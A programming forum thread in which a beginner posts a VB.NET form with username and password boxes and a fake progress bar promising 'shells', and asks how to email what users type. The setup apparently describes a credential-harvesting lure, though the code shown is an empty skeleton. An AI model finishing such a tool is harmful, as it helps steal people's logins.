Thread: Sending to email help

Sending to email help

Hello guys , i am a new user here

I am trying to do something that send the text witch has been typed in the text box to my email .

Here i give you the code so i hope you can help me .

PHP Code:
    Public Class Form1

Private Sub Form1_Load(ByVal sender As System.ObjectByVal e As System.EventArgsHandles MyBase.Load

End Sub

Private Sub Label1_Click(ByVal sender As System.ObjectByVal e As System.EventArgsHandles Label1.Click

End Sub

Private Sub Label2_Click(ByVal sender As System.ObjectByVal e As System.EventArgsHandles Label2.Click

End Sub

Private Sub Button1_Click(ByVal sender As System.ObjectByVal e As System.EventArgsHandles Button1.Click
            Timer1
    .start()

End Sub

Private Sub Timer1_Tick(ByVal sender As System.ObjectByVal e As System.EventArgsHandles Timer1.Tick
            ProgressBar1
    .Increment(4)
            If 
    ProgressBar1.Value 100 Then
                Label6
    .Text "Done . Please wait 1 hour to get your shells"

End If

Label5.Text ProgressBar1.Value & (" %")

End Sub

Private Sub Label6_Click(ByVal sender As System.ObjectByVal e As System.EventArgsHandles Label6.Click

End Sub

Private Sub Label5_Click(ByVal sender As System.ObjectByVal e As System.EventArgsHandles Label5.Click

End Sub

Private Sub Label4_Click(ByVal sender As System.ObjectByVal e As System.EventArgsHandles Label4.Click

End Sub

Private Sub UsernameBox1_TextChanged(ByVal sender As System.ObjectByVal e As System.EventArgsHandles TextBox1.TextChanged

End Sub

Private Sub PasswordBox2_TextChanged(ByVal sender As System.ObjectByVal e As System.EventArgsHandles TextBox2.TextChanged

End Sub

Private Sub Label7_Click(ByVal sender As System.ObjectByVal e As System.EventArgs)

End Sub
    End 
    Class 
    IDK where to start over and make it to be sent to my email . Help please ....

Re: Sending to email help

You would use the System.Net.Mail.MailMessage class to send an email and use the Text of the TextBox as the Body. Search online and you'll find plenty of examples. Just make sure that you don't use the obsolete System.Web.Mail.MailMessage class.

As i saw in the internet it was really hard , can someone put it in the code please because i really don't understand it

Not sure if this would be of any help (see first post)?
    when you quote a post could you please do it via the "Reply With Quote" button or if it multiple post click the "''+" button then "Reply With Quote" button.
    If this thread is finished with please mark it "Resolved" by selecting "Mark thread resolved" from the "Thread tools" drop-down menu.
    https://get.cryptobrowser.site/30/4111672